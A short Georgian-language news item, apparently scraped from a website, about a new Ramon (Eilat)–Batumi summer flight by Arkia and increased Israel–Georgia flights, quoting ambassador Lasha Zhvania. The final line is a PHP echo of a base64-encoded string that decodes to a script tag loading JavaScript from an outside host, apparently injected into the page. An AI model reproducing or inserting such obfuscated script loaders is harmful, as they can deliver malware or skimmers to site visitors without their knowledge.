celsiusi
ავერსი საქკაბელი
ისრაელ-საქართველოს მიმართულებით ახალი ავიარეისი დაინიშნა. აღნიშნულთან დაკავშირებით ინფორმაციას ისრაელის სახელმწიფოში საქართველოს საგანგებო და სრულუფლებიანი ელჩი ლაშა ჟვანია ავრცელებს.
 
„გასულ კვირას შევძელით ისრაელ-საქართველოს შორის ყოველკვირეული ფრენების სიხშირის 35-დან 42 ფრენამდე გაზრდა.
 
ახლა დაგვემატა სრულიად ახალი – რამონი (ეილათი)-ბათუმის მიმართულება, რომელსაც ზაფხულის სეზონზე, კომპანია „აირკია“ შეასრულებს.
 
მადლობა ჩვენი ეკონომიკის სამინისტროს, ავიაციის სააგენტოს და ტურიზმის ადმინისტრაციის ფანტასტიკურ გუნდს, ასევე ისრაელელ კოლეგებს – საოცრად ეფექტური თანამშრომლობისთვის.
 
ორ ქვეყანას შორის ავიამიმოსვლის ზრდა ჩვენი ქვეყნის მიმართ დიდ ინტერესზე მიუთითებს, რაც პირველ რიგში, უსაფრთხო, კარგი, სასიამოვნო გარემოს არსებობიდან გამომდინარეობს.
 
წარმატებები საქართველოს და ისრაელის ავიაკომპანიებს“, – წერს ლაშა ჟვანია სოციალურ ქსელში.
 
 
441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");